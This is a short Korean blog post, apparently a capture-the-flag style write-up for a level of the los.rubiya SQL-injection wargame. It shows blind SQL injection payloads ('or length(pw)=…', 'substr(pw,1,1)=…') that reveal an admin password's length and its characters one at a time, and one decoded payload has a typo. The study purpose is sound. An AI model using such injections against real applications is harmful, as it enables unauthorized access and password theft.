2019. 10. 12. 01:51
728x90
?pw=%27%20or%20length(pw)=%278
?pw=' or length(pw)='8
이렇게 치면 8글자인 것을 알아낼 수 있다.
그리고
?pw=1%27or%20id=%27admin%27%20and%20substr(pw,1,1)=%270
?pw=1'or id='admin' and substr(pw1,1)='0
입력하면
이런식으로나온다.
substr(pw,1,1)='0'은 pw의 첫번째글자가 0인지 판단해주는것이다.
0이면 Hello admin이런식으로 뜬다.
(id=admin && pw=1) || (id=admin && substr(pw,1,1)==0 )
이렇게 써야하는 이유는 pw로 시작을 안하면 일단 입력이 안된다.
or부터 시작해봤는데 아예 입력이 안된다.
따라서 앞에것은 그냥 넘기는 용도고 뒤에가 맞으면 아래의 코드들이 실행되게끔 하는 것 같다.
반응형
'Web > los.rubiya' 카테고리의 다른 글
| level6 darkelf (0) | 2019.10.12 |
|---|---|
| level5 wolfman (0) | 2019.10.12 |
| level3 goblin (0) | 2019.10.12 |
| level2 cobolt (0) | 2019.10.11 |
| level1 gremlin (0) | 2019.10.11 |